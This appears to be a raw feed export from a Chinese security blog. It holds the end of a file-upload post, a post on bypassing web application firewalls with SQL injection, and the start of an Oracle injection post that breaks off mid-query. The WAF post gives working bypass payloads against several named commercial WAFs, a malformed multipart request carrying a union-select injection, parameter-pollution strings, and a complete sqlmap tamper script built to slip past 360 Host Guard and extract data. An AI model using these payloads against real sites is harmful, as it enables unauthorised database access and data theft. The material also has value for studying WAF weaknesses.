class=\"highlight\"><code>https:\/\/soroush.secproject.com\/downloadable\/microsoft_iis_tilde_character_vulnerability_feature.pdf     #iis\u7aef\u6587\u4ef6\u540d\u6f0f\u6d1e\nhttps:\/\/github.com\/ironbee\/ironbee-rules\/blob\/master\/support\/php\/test_fs_evasion.php \nhttps:\/\/soroush.secproject.com\/blog\/2014\/07\/file-upload-and-php-on-iis-wildcards\/  \nhttp:\/\/byd.dropsec.xyz\/2017\/02\/21\/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E7%BB%95%E8%BF%87\/\n<\/code><\/pre><\/div><\/div>\n<p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/07\/file-upload\/\">file-upload<\/a><\/p>\n\n","pubDate":"Mon, 30 Jul 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/07\/file-upload\/","guid":"http:\/\/notwhy.github.io\/2018\/07\/file-upload\/","category":"file-upload"},{"title":"sql-injection-fuck-waf","description":"<p>0x0 \u524d\u8a00 \n0x1 \u6ce8\u5165\u70b9\u68c0\u6d4b \n0x2 bypass waf \n0x3 \u81ea\u52a8\u5316<\/p>\n\n<h3 id=\"0x0-\u524d\u8a00\">0x0 \u524d\u8a00<\/h3>\n<hr \/>\n<p>\u2003\u2003\u8fd9\u91cc\u662f\u7b80\u5355\u5bf9sql\u6ce8\u5165\u7ed5\u8fc7waf\u7684\u4e00\u4e2a\u5c0f\u603b\u7ed3\uff0c\u975e\u5b89\u5168\u7814\u7a76\u5458\uff0c\u8fd9\u91cc\u4e0d\u8bb2\u539f\u7406\uff0c\u5173\u4e8e\u539f\u7406\u641c\u96c6\u4e86\u4e00\u4e9b\u5176\u4ed6\u5927\u4f6c\u7684\u6587\u7ae0\uff08\u6587\u7ae0\u5728\u6700\u4e0b\u9762\u8bf7\u81ea\u53d6\uff09\uff0c\u611f\u8c22\u4ed6\u4eec\u7684\u5206\u4eab\uff0c\u6bd4\u7740\u846b\u82a6\u753b\u74e2\uff0c\u5bf9\u7740\u5404\u5927waf\u5382\u5546\u8ddf\u7740\u5e08\u5085\u4eec\u6765\u4e00\u6ce2\u5b9e\u6218,\u8fdb\u884c\u4e00\u4e2a\u7b80\u5355\u7684\u603b\u7ed3\u3002<\/p>\n<h3 id=\"0x1-\u6ce8\u5165\u70b9\u68c0\u6d4b\">0x1 \u6ce8\u5165\u70b9\u68c0\u6d4b<\/h3>\n<p>\u2003\u2003\u4e00\u822c\u7684\u6ce8\u5165\u8fd8\u662f\u5f88\u597d\u5224\u65ad\u7684\uff0c\u7279\u522b\u662f\u57fa\u4e8e\u62a5\u9519\uff0c\u4f46\u6709\u7684\u65f6\u5019\u7565\u5fae\u6709\u4e9b\u5947\u8469\u7684\u73af\u5883\uff0c\u518d\u52a0\u4e0a\u4e00\u4e9b\u4e71\u4e03\u516b\u7cdf waf\uff0c\u5c31\u6bd4\u8f83\u96be\u641e\u4e86\uff0c\u8fd9\u91cc\u7b80\u5355\u603b\u7ed3\u4e86\u4e00\u4e9b\u65b9\u6cd5\u3002<\/p>\n<ul>\n  <li>\n    <p>\u5229\u7528\u6570\u636e\u5e93\u72ec\u6709\u7684\u4e00\u4e9b\u51fd\u6570 <br \/>\naccess  asc chr len #access-functions <br \/>\nmysql   substring   substr length <br \/>\nmssql   char ascii len substring    #mssql function str <br \/>\noracle  ascii  chr length  substr upper lower replace(x,old,new) <br \/>\n\u8fd9\u4e9b\u6570\u636e\u5e93\u4e2d\u4e00\u4e2a\u901a\u7528\u7684\u51fd\u6570\u5c31\u662fabs\uff0c\u5982\u679c\u89c9\u5f97\u662fint\u578b\u6ce8\u5165\u4e0d\u59a8\u5148\u8bd5\u8bd52-abs(1),\u7136\u540e\u7ed3\u5408\u5404\u7c7b\u6570\u636e\u5e93\u7684\u4e00\u4e9b\u51fd\u6570\u6765\u5224\u65ad\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u7684\u6ce8\u5165,\u5f53\u7136\u5bf9\u6570\u636e\u5e93\u4e86\u89e3\u8d8a\u591a\u8d8a\u597d\u3002<\/p>\n  <\/li>\n  <li>\n    <p>\u6539\u53d8\u8bf7\u6c42\u65b9\u5f0f <br \/>\n\u6839\u636e\u7ecf\u9a8c\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\u5404\u811a\u672c\u5bf9http request method\u5982\u4e0b\uff0c\u8fd9\u91cc\u4ee5GET\u4e3a\u4f8b\u5b50\uff0c\u9488\u5bf9www.vul.com\/?id=1\u6765\u8fdb\u884c\u5224\u65ad\u3002 <br \/>\nphp GET <br \/>\naspx GET <br \/>\nasp GET POST COOKIE <br \/>\njsp GET POST <br \/>\n\u5e73\u5e38\u6e17\u900f\u6d4b\u8bd5\u4e2d\u603b\u662f\u9047\u5230\u5404\u79cd\u5404\u6837\u7684waf\uff0c\u6709\u7684\u65f6\u5019\u4e00\u4e2a\u5355\u5f15\u53f7\u5c31\u6b7b\u4e86\uff0c\u8fd9\u4e2a\u65f6\u5019\u9996\u9009\u7684\u4e00\u4e9b\u65b9\u6cd5\u5c31\u662f\u8f6c\u6362\u8bf7\u6c42\u5934\u4e86\uff0c\u6bd5\u7adfGET\u4e0d\u5982POST\uff0cPOST\u4e0d\u5982multipart\/form-data\uff0c\u5f53\u7136\u4e0d\u8981\u770b\u5230php\u5c31\u4e0d\u53bb\u8f6c\u6362\uff0c\u4efb\u4f55\u60c5\u51b5\u4e0b\u90fd\u8981\u5c1d\u8bd5\u4e00\u4e0b\u3002 <br \/>\n\u5f53\u7136\uff0c\u53ef\u4ee5\u7528burp\u5f88\u65b9\u4fbf\u7684\u6765\u8fdb\u884cchange request method\u4ee5\u53cachange body encoding\u3002<\/p>\n  <\/li>\n<\/ul>\n\n<p>\u2003\u2003\u4e4b\u524d\u78b0\u5230\u8fc7\u4e00\u4e2a\u6709\u8da3\u7684\u4f8b\u5b50\uff0casp\u7684\u7ad9\u70b9\u53ef\u4ee5\u901a\u8fc7cookie\u63d0\u4ea4\u6570\u636e\uff0c\u800c\u4e14\u53ef\u4ee5\u4f7f\u7528len\u51fd\u6570\uff0c\u53ef\u4ee5\u521d\u6b65\u5224\u65ad\u4e3aaccess\u6216\u8005mssql\u6570\u636e\u5e93\uff0c\u4f46\u662f\u8fd8\u662f\u5f88\u5934\u75bc\uff0c\u6700\u540e\u4e00\u4f4d\u5927\u54e5\u4f7f\u7528\u4e0b\u9762\u7684\u51fd\u6570\u53ef\u4ee5\u5224\u65ad\u6210\u529f\u3002www.vul.com\/2.asp?id=482<br \/>\n\u2003\u2003483-chr(chr(52)&amp;chr(57))    #=482<br \/>\n\u2003\u2003chr(52) \u20184\u2019     <br \/>\n\u2003\u2003chr(57) \u20189\u2019  <br \/>\n\u2003\u2003chr(49) \u20181\u2019 #chr(52)&amp;chr(57)\u4e3a49 chr(49)\u4e3a1 \u867d\u7136\u6700\u540e\u4e5f\u6ca1\u4ec0\u4e48\u5375\u7528\u4f46\u8fd8\u662f\u633a\u6709\u610f\u601d\u7684<\/p>\n\n<ul>\n  <li>\n    <p>\u6570\u636e\u5e93\u7279\u6027 <br \/>\nmysql   \u6ce8\u91ca\u7b26\u53f7# \u2013+ ` ;%00 \/<strong>\/ \u5b57\u7b26\u4e32\u53ef\u4ee5\u4f7f\u7528\u6210\u5bf9\u7684\u5f15\u53f7\u2019admin\u2019 = admin\u2019\u2019\u2019 <br \/>\nmssql   \u6ce8\u91ca\u7b26\u53f7\u2013 \/<\/strong>\/ ;%00 <br \/>\noracle  \u6ce8\u91ca\u7b26\u53f7\u2013 \/**\/ admin=adm\u2019||\u2019in<br \/>\n\u7a7a\u767d\u7b26\u53f7\nMySQL5 09 0A 0B 0C 0D A0 20<br \/>\nOracle 00 0A 0D 0C 09 20<br \/>\nMSSQL 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20<br \/>\nmysql\u548cmssql\u53ef\u4ee5\u4f7f\u7528|\u6765\u8fdb\u884c\u76f8\u5173\u7684\u8fd0\u7b97\uff0c\u800coracle\u4f1a\u628a||\u5f53\u6210\u8fde\u63a5\u5b57\u7b26\u3002<\/p>\n  <\/li>\n  <li>\n    <p>web\u5bb9\u5668\u7279\u6027<br \/>\n\u8fd9\u91cc\u76f4\u63a5\u53ef\u4ee5\u8df3\u8fc7\u770bhttp:\/\/drops.xmd5.com\/static\/drops\/tips-7883.html \u8fd9\u7bc7\u6587\u7ae0<\/p>\n  <\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>1. iis+asp(x)  \n    1.%u\u7279\u6027: iis\u652f\u6301\u5bf9unicode\u7684\u89e3\u6790\uff0c\u5982:payload\u4e3a[s%u006c%u0006ect],\u89e3\u6790\u51fa\u6765\u540e\u5219\u662f[select]\n     %u0061nd 1=1\n    \u53e6\u7c7b%u\u7279\u6027: unicode\u5728iis\u89e3\u6790\u4e4b\u540e\u4f1a\u88ab\u8f6c\u6362\u6210multibyte\uff0c\u4f46\u662f\u8f6c\u6362\u7684\u8fc7\u7a0b\u4e2d\u53ef\u80fd\u51fa\u73b0:\u591a\u4e2awidechar\u53ef\u80fd\u4f1a\u8f6c\u6362\u4e3a\u540c\u4e00\u4e2a\u5b57\u7b26\u3002\n    \u5982\uff1aselect\u4e2d\u7684e\u5bf9\u5e94\u7684unicode\u4e3a%u0065\uff0c\u4f46\u662f%u00f0\u540c\u6837\u4f1a\u88ab\u8f6c\u6362\u6210\u4e3ae s%u00f0lect\n    iis+asp\n    2.%\u7279\u6027: union selec%t user fr%om dd #iis+asp asp+iis\u73af\u5883\u4e0b\u4f1a\u5ffd\u7565\u6389\u767e\u5206\u53f7\uff0c\u5982\uff1apayload\u4e3a[sele%ct], \u89e3\u6790\u51fa\u6765\u540e\u5219\u662f[select]\n    3.asp\/asp.net\u5728\u89e3\u6790\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u5141\u8bb8Content-Type: application\/x-www-form-urlencoded\u7684\u6570\u636e\u63d0\u4ea4\u65b9\u5f0fselect%201%20from%20user\n    asp\/asp.net request\u89e3\u6790:\n    4.\u5728asp\u548casp.net\u4e2d\u83b7\u53d6\u7528\u6237\u7684\u63d0\u4ea4\u7684\u53c2\u6570\u4e00\u822c\u4f7f\u7528request\u5305\uff0c\u5f53\u4f7f\u7528request(\u2018id\u2019)\u7684\u5f62\u5f0f\u83b7\u53d6\u5305\u7684\u65f6\u5019\uff0c\u4f1a\u51fa\u73b0GET\uff0cPOST\u5206\u4e0d\u6e05\u7684\u60c5\u51b5\uff0c\u8b6c\u5982\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a\u8bf7\u6c42\u5305\uff0cMETHOD\u4e3aGET\uff0c\u4f46\u662f\u5305\u4e2d\u8fd8\u5e26\u6709POST\u7684\u5185\u5bb9\u548cPOST\u7684content-type, \u6362\u4e00\u79cd\u7406\u89e3\u65b9\u5f0f\u4e5f\u5c31\u662f\u5c06\u539f\u672c\u7684post\u6570\u636e\u5305\u7684method\u6539\u6210GET,\u5982\u679c\u4f7f\u7528request(\u2018id\u2019)\u65b9\u5f0f\u83b7\u53d6\u6570\u636e\uff0c\u4ecd\u4f1a\u83b7\u53d6\u5230post\u7684\u5185\u5bb9\n2. php+apache\u7578\u5f62\u7684boundary\n    1.php\u5728\u89e3\u6790multipart data\u7684\u65f6\u5019\u6709\u81ea\u5df1\u7684\u7279\u6027\uff0c\u5bf9\u4e8eboundary\u7684\u8bc6\u522b\uff0c\u53ea\u53d6\u4e86\u9017\u53f7\u524d\u9762\u7684\u5185\u5bb9\uff0c\u4f8b\u5982\u6211\u4eec\u8bbe\u7f6e\u7684boundary\u4e3a\u2014-aaaa,123456\uff0cphp\u89e3\u6790\u7684\u65f6\u5019\u53ea\u8bc6\u522b\u4e86\u2014-aaaa,\u540e\u9762\u7684\u5185\u5bb9\u5747\u6ca1\u6709\u8bc6\u522b\u3002\u7136\u800c\u5176\u4ed6\u7684\u5982WAF\u5728\u505a\u89e3\u6790\u7684\u65f6\u5019\uff0c\u6709\u53ef\u80fd\u83b7\u53d6\u7684\u662f\u6574\u4e2a\u5b57\u7b26\u4e32\uff0c\u6b64\u65f6\u53ef\u80fd\u5c31\u4f1a\u51fa\u73b0BYPASS\n    Content-Type: multipart\/form-data; boundary=------,xxxx\n    Content-Length: 191\n    \n    ------,xxxx\n    Content-Disposition: form-data; name=\"img\"; filename=\"img.gif\"\n    \n    GIF89a\n    ------\n    Content-Disposition: form-data; name=\"id\"\n    \n    1' union select null,null,flag,null from flag limit 1 offset 1-- -\n    --------\n    ------,xxxx--\n    2.\u7578\u5f62method(header\u5934\u4e2d)\n    \u67d0\u4e9bapache\u7248\u672c\u5728\u505aGET\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u65e0\u8bbamethod\u4e3a\u4f55\u503c\u5747\u4f1a\u53d6\u51faGET\u7684\u5185\u5bb9\u3002\u5982\u8bf7\u6c42\u7684method\u540d\u4e3aDOTA\uff0c\u4f9d\u7136\u4f1a\u8fd4\u56deGET\u65b9\u6cd5\u7684\u503c\uff0c\u5373,\u53ef\u4ee5\u4efb\u610f\u66ff\u6362GET\u65b9\u6cd5\u4e3a\u5176\u5b83\u503c\uff0c\u4f46\u4ecd\u80fd\u6709\u6548\u5de5\u4f5c\uff0c\u4f46\u5982\u679cwaf\u4e25\u683c\u6309\u7167GET\u65b9\u6cd5\u53d6\u503c\uff0c\u5219\u53d6\u4e0d\u5230\u4efb\u4f55\u5185\u5bb9\n3. web\u5e94\u7528\u5c42\n    1.\u53cc\u91cdURL\u7f16\u7801: \u5373web\u5e94\u7528\u5c42\u5728\u63a5\u53d7\u5230\u7ecf\u8fc7\u670d\u52a1\u5668\u5c42\u89e3\u7801\u540e\u7684\u53c2\u6570\u540e\uff0c\u53c8\u8fdb\u884c\u4e86\u4e00\u6b21URL\u89e3\u7801\n    2.\u53d8\u6362\u8bf7\u6c42\u65b9\u5f0f\uff1a\n    \u5728web\u5e94\u7528\u4e2d\u4f7f\u7528\u4e86\u7edf\u4e00\u83b7\u53d6\u53c2\u6570\u7684\u65b9\u5f0f: \u5982php\u91cc\u4f7f\u7528$_REQUEST\u83b7\u53d6\u53c2\u6570\uff0c\u4f46WAF\u5c42\u5982\u679c\u8fc7\u6ee4\u4e0d\u5168\u5219\u5bb9\u6613bypass\uff0c\u5982\uff0cwaf\u5c42\u8fc7\u6ee4\u4e86get\/post\uff0c\u4f46\u6ca1\u6709\u8fc7\u6ee4cookie\uff0c\u800cweb\u5e94\u7528\u5c42\u5e76\u4e0d\u5173\u5fc3\u53c2\u6570\u662f\u5426\u6765\u81eacookie\n    urlencode\u548cform-data: POST\u5728\u63d0\u4ea4\u6570\u636e\u7684\u65f6\u5019\u6709\u4e24\u79cd\u65b9\u5f0f\uff0c\u7b2c\u4e00\u79cd\u65b9\u5f0f\u662f\u4f7f\u7528urlencode\u7684\u65b9\u5f0f\u63d0\u4ea4\uff0c\u7b2c\u4e8c\u79cd\u65b9\u5f0f\u662f\u4f7f\u7528form-data\u7684\u65b9\u5f0f\u63d0\u4ea4\u3002\u5f53\u6211\u4eec\u5728\u6d4b\u8bd5\u7684\u65f6\u5019\uff0c\u5982\u679c\u53d1\u73b0POST\u63d0\u4ea4\u7684\u6570\u636e\u88ab\u8fc7\u6ee4\u6389\u4e86\uff0c\u6b64\u65f6\u53ef\u4ee5\u8003\u8651\u4f7f\u7528form-data\u7684\u65b9\u5f0f\u53bb\u63d0\u4ea4  \n4. hpp \n    asp.net + iis\uff1aid=1,2,3  #?str=a%27\/*&amp;str=*\/and\/*&amp;str=*\/@@version=0--\n    asp + iis \uff1aid=1,2,3\n    php + apache \uff1aid=3\n    jsp + tomcat \uff1aid=1\n<\/code><\/pre><\/div><\/div>\n<p>\u8fd9\u91cc\u63d0\u4f9b\u4e00\u79cd\u9488\u5bf9\u666e\u901a\u68c0\u6d4b\u7684\u65b9\u6cd5\uff0c\u5927\u5bb6\u53ef\u81ea\u884c\u53d1\u6325\u3002\nmysql int\u578b\uff1a %20%26%201=1  mysql.php?id=1%20%26%201=1\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/1.png\" alt=\"image\" \/>\n\u53e6\u5916\u5728\u5b57\u7b26\u578b\u4e2d \u2018and\u20191\u2019=\u20191\u662f\u4e0d\u9700\u8981\u52a0\u7a7a\u683c\u7684\uff0c\u6709\u65f6\u5019\u4e5f\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9bwaf\u5224\u65ad\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/2.png\" alt=\"image\" \/><\/p>\n\n<h3 id=\"0x2-bypasswaf\">0x2 bypasswaf<\/h3>\n<p>\u7531\u4e8emysql\u7684\u7075\u6d3b\u6027\uff0c\u8fd9\u91cc\u4ee5mysql\u7ed5\u8fc7\u4e3a\u4e3b\uff0c\u9488\u5bf9\u5404\u5927\u4e3b\u6d41waf\u5382\u5546\u8fdb\u884c\u4e00\u4e2a\u6d4b\u8bd5\uff0c\u4e3b\u8981\u6d4b\u8bd5\u5728\u7ebf\u7248\u7684\uff0c\u672c\u5730\u5c31\u5b89\u88c5\u4e86\u4e00\u4e2a360\u4e3b\u673a\u536b\u58eb\u3002\n\u5176\u4e2dhttp:\/\/192.168.44.132\/mysql.php?id=1\u662f\u6211\u672c\u5730\u7684\u4e00\u4e2a\u6d4b\u8bd5\u73af\u5883<br \/>\n\u5176\u4e2d\u4e0b\u9762\u7684\u7ed5\u8fc7\u90fd\u662f\u4ee5fuzz\u4e3a\u4e3b\uff0c\u4e0d\u8003\u8651web\u5bb9\u5668\u7684\u7279\u6027\uff0c\u5c1d\u8bd5\u7ed5\u8fc7\u8054\u5408\u67e5\u8be2 -1 union select 1\uff0c2\uff0c3 from dual<\/p>\n<ul>\n  <li>\u767e\u5ea6\u4e91\u52a0\u901fbypass<br \/>\nunion select    #filter<br \/>\nfrom dual   #not filted<br \/>\nselect from dual    #filter<br \/>\n\u53ea\u9700\u8981\u7ed5\u8fc7select\u5373\u53ef \u4f7f\u7528\u2013+aaaaaa%0a\u53efbypass<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/3.png\" alt=\"image\" \/><\/li>\n  <li>360\u4e3b\u673a\u536b\u58ebbypass <br \/>\n\u53d1\u73b0%23%0aand%230a1=1    \u53ef\u4ee5\u7ed5\u8fc7and 1=1 \u9650\u5236<br \/>\n\u6700\u540e\u5728union select from\u7684\u65f6\u5019\u5374\u7ed5\u4e0d\u8fc7\u53bb  <br \/>\n\u76f4\u63a5\u4f7f\u7528\u5927\u5b57\u7b26\u4e32\u6765fuzz %23-FUZZ-%0a https:\/\/github.com\/minimaxir\/big-list-of-naughty-strings\/blob\/master\/blns.txt \u53d1\u73b0\u53ef\u4ee5\u6210\u529f\u7ed5\u8fc7waf<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/4.png\" alt=\"image\" \/><\/li>\n  <li>\u4e91\u9501<br \/>\nunion select \u5982\u4e0b\u5c31\u53ef\u4ee5\u7ed5\u8fc7<br \/>\nhttp:\/\/www.yunsuo.com.cn\/download.html?id=1%20union\/<em>!\/<\/em>!select%201,2,3*\/<br \/>\n\u8f6c\u6362\u6210multiform\/data\u53ef\u8f7b\u677e\u7ed5\u8fc7 \n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/7.png\" alt=\"image\" \/><\/li>\n  <li>\u5b89\u5168\u72d7bypass<br \/>\n\u76f4\u63a5\u641e\u5c31\u884c\u4e86\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/6.png\" alt=\"image\" \/>\n\u5f53\u7136\u4e5f\u53ef\u4ee5chunked\u63d0\u4ea4\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/chunked.png\" alt=\"image\" \/><\/li>\n  <li>\u963f\u91cc\u4e91 <br \/>\n\u5c1d\u8bd5\u4f7f\u7528\u81ea\u5b9a\u4e49\u53d8\u91cf\u65b9\u5f0f\u6765\u7ed5\u8fc7 @a:=(select @b:=<code class=\"highlighter-rouge\">table_name<\/code>from{a information_schema.<code class=\"highlighter-rouge\">TABLES<\/code> }limit 0,1)union select \u20181\u2019,@a<br \/>\n@p:=(select)\u88ab\u8fc7\u6ee4 fuzz\u4e0bp\u53c2\u6570\u4f7f\u7528@$:=(select)\u53ef\u4ee5\u7ed5\u8fc7<br \/>\nunion select 1\u88ab\u8fc7\u6ee4   \u4f7f\u7528union%23aa%0a\/<em>!select\u2013%01%0a<\/em>\/1,@$,3 \u53ef\u4ee5\u7ed5\u8fc7 <br \/>\n\u53d1\u73b0\u91cd\u70b9\u5c31\u662f\u7ed5\u8fc7\u8868\u540d select 1 from dual \u4e00\u4e9b\u5e38\u89c4\u7684\u65b9\u6cd5\u6d4b\u8bd5\u65e0\u679c \u968f\u4fbffuzz\u4e0b\u6ce8\u91ca\/<em>!\u6570\u5b57<\/em>\/\u5374\u5076\u7136\u53d1\u73b0\u6709\u4fe9\u4e2a\u6570\u636e\u5305\u9057\u6f0f<br \/>\n\u60f3\u8d77\u4e86\u4ee5\u524d\u4e4c\u4e91\u4e0a\u4e00\u54e5\u7684\u7684\u4e00\u4e2a\u6f0f\u6d1ehttps:\/\/wooyun.shuimugan.com\/bug\/view?bug_no=94367\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz1.png\" alt=\"image\" \/>\n\u96be\u9053\u662f\u56e0\u4e3a\u8bbf\u95ee\u9891\u7387\u5bfc\u81f4\u9057\u6f0f\uff1f\u968f\u5373\u6211\u53c8\u8fdb\u884c\u4e86\u4e00\u4e9bfuzz fuzz1w\u52305w\u6570\u5b57\u578b\u7684\u6ce8\u91ca \u52a0\u5927\u7ebf\u7a0b \u53d1\u73b0\u9057\u6f0f\u4e86\u66f4\u591a<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz2.png\" alt=\"image\" \/>\n\u6211\u60f3\u6d4b\u8bd5\u4e00\u4e0b\u4e4b\u524d\u7684waf\u6311\u6218\u8d5b\uff0c\u53d1\u73b0\u4e4b\u524d\u63d0\u4ea4\u7684payload\u5df2\u7ecf\u4fee\u590d\u4e86\uff0c\u800c\u4e14\u90a3\u4e2a\u6f0f\u6d1eurl\u65e0\u6cd5\u8bbf\u95ee\u4e86:(  \u6240\u4ee5\u65e0\u6cd5\u786e\u8ba4\u3002<br \/>\n\u968f\u5373\u6211\u53c8\u8fdb\u884c\u4e86\u4e00\u4e9b\u8d85\u957f\u5b57\u7b26\u4e32\u7684fuzz \u7b80\u5355fuzz1w-10w \u4ee5500\u4e3astep \u53d1\u73b0\u73b0\u8c61\u66f4\u591a\u4e86 \u53ef\u521d\u6b65\u5224\u65ad\u5b58\u5728\u9057\u6f0f\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/alifuzz4.png\" alt=\"image\" \/>\n    <h3 id=\"0x3-\u81ea\u52a8\u5316\">0x3 \u81ea\u52a8\u5316<\/h3>\n    <p>\u4ee5360\u4e3b\u673a\u536b\u58eb\u4e3a\u4f8b\uff0c\u7f16\u5199sqlmap tamper\u811a\u672c\u3002<br \/>\n\u6b63\u5e38\u65e0waf sqlmap\u8054\u5408\u67e5\u8be2\u5982\u4e0b\uff1a<br \/>\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/sqlmap.png\" alt=\"image\" \/>\n\u5f00\u542f\u4e3b\u673a\u536b\u58eb\uff0c\u653e\u5230\u6d4f\u89c8\u5668\u8c03\u8bd5\uff0c\u4fee\u6539\u76f8\u5173payload\u4f7f\u5176\u80fd\u6b63\u5e38\u8fd0\u884c\u3002\n\u6700\u540etamper\u811a\u672c\u5982\u4e0b\uff1a<\/p>\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>from lib.core.enums import PRIORITY\nfrom lib.core.settings import UNICODE_ENCODING\n__priority__ = PRIORITY.LOW\ndef dependencies():\n  pass\ndef tamper(payload, **kwargs):\n  \"\"\"\n  Replaces keywords\n  &gt;&gt;&gt; tamper('UNION SELECT id FROM users')\n  '1 union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/ NULL,\/*!12345CONCAT*\/(0x7170706271,IFNULL(\/*!12345CASt(*\/COUNT(*) AS CHAR),0x20),0x7171786b71),NULL\/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*\/INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e AND table_schema=0x73716c696e6a656374--\n  \"\"\"\n  if payload:\n      payload=payload.replace(\"UNION ALL SELECT\",\"union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/\")\n      payload=payload.replace(\"UNION SELECT\",\"union%23!@%23$%%5e%26%2a()%60~%0a\/*!12345select*\/\")\n      payload=payload.replace(\" FROM \",\"\/*!%23!@%23$%%5e%26%2a()%60~%0afrOm*\/\")\n      payload=payload.replace(\"CONCAT\",\"\/*!12345CONCAT*\/\")\n      payload=payload.replace(\"CAST(\",\"\/*!12345CAST(*\/\")\n      payload=payload.replace(\"CASE\",\"\/*!12345CASE*\/\")\n      payload=payload.replace(\"DATABASE()\",\"database\/**\/()\")\n                \n  return payload\n<\/code><\/pre><\/div>    <\/div>\n    <p>\u53ef\u4ee5\u6210\u529f\u83b7\u53d6\u5230\u76f8\u5173\u6570\u636e\u3002\n<img src=\"\/images\/posts\/sql-injection-fuck-waf\/sqlmap2.png\" alt=\"image\" \/>\n\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>http:\/\/www.anquan.us\/search?keywords=bypass&amp;content_search_by=by_bugs\nhttp:\/\/drops.xmd5.com\/static\/drops\/tips-7883.html\nhttps:\/\/xianzhi.aliyun.com\/forum\/attachment\/big_size\/wafbypass_sql.pdf\nhttp:\/\/drops.xmd5.com\/static\/drops\/papers-4323.html  \nhttps:\/\/www.cnblogs.com\/xiaozi\/p\/6927348.html  \nhttp:\/\/swende.se\/blog\/HTTPChunked.html#  \nhttps:\/\/xz.aliyun.com\/t\/1239\nhttp:\/\/www.sqlinjectionwiki.com\/categories\/2\/mysql-sql-injection-cheat-sheet\/  \nhttps:\/\/mp.weixin.qq.com\/s\/S318-e4-eskfRG38HZk_Qw  \nhttps:\/\/joychou.org\/web\/nginx-Lua-waf-general-bypass-method.html    #nginx lua waf  \nhttps:\/\/www.owasp.org\/index.php\/SQL_Injection_Bypassing_WAF  \nhttps:\/\/websec.ca\/kb\/sql_injection#MySQL_Comment_Out_Query  \nhttps:\/\/forum.bugcrowd.com\/t\/sqlmap-tamper-scripts-sql-injection-and-waf-bypass\/423\n<\/code><\/pre><\/div>    <\/div>\n  <\/li>\n<\/ul>\n\n<p>\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/2018\/06\/sql-injection-fuck-waf\/\">sql-injection-fuck-waf<\/a><\/p>\n\n","pubDate":"Fri, 29 Jun 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/06\/sql-injection-fuck-waf\/","guid":"http:\/\/notwhy.github.io\/2018\/06\/sql-injection-fuck-waf\/","category":"sql-injection"},{"title":"hacking-oracle","description":"<p>0x0 \u524d\u8a00 \n0x1 \u4fe1\u606f\u63a2\u6d4b \n0x2 \u547d\u4ee4\u6267\u884c \n0x3 \u5b9e\u6218<\/p>\n<h3 id=\"0x0-\u524d\u8a00\">0x0 \u524d\u8a00<\/h3>\n<hr \/>\n<p>\u2003\u2003\u5728\u4e59\u65b9\u505a\u6e17\u900f\u6d4b\u8bd5\u7684\u65f6\u5019\uff0c\u7ecf\u5e38\u4f1a\u9047\u5230oracle\u6570\u636e\u5e93\u7684\u6ce8\u5165\uff0c\u8fd9\u91cc\u662f\u9488\u5bf9oracle\u6570\u636e\u5e93\u8fdb\u884csql\u6ce8\u5165\u4e00\u7cfb\u5217\u603b\u7ed3\uff0c\u5176\u4e2d\u7edd\u5927\u5927\u591a\u6570\u77e5\u8bc6\u90fd\u662f\u8ddf\u7740\u5404\u4f4d\u5927\u54e5\u6216\u8005\u524d\u8f88\u5b66\u6765\uff0c\u611f\u8c22\u4ed6\u4eec\u7684\u5206\u4eab\u3002 <br \/>\n\u6d4b\u8bd5\u6570\u636e\u5e93\u5982\u4e0b\uff1a  <br \/>\nORACLE DATABASE 10G ENTERPRISE EDITION RELEASE 10.2.0.1.0 <br \/>\nOracle Database 11g Express Edition Release 11.2.0.2.0.<br \/>\nOracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit<br \/>\nOracle Database 10g Enterprise Edition Release 10.2.0.3.0  <br \/>\n\u4ee5\u4e0b\u6240\u8bf4\u768410g\u9ed8\u8ba4\u4e3a10.2.0.3.0 11g\u9ed8\u8ba4\u4e3a11.2.0.1.0<\/p>\n<h3 id=\"0x1-\u4fe1\u606f\u63a2\u6d4b\">0x1 \u4fe1\u606f\u63a2\u6d4b<\/h3>\n<ul>\n  <li>SQL<\/li>\n<\/ul>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>select user from dual #\u5f53\u524d\u7528\u6237\nSELECT banner FROM v$version WHERE banner LIKE 'Oracle%';   #oracle\u7248\u672c\nselect wmsys.wm_concat(granted_role) from user_role_privs-- 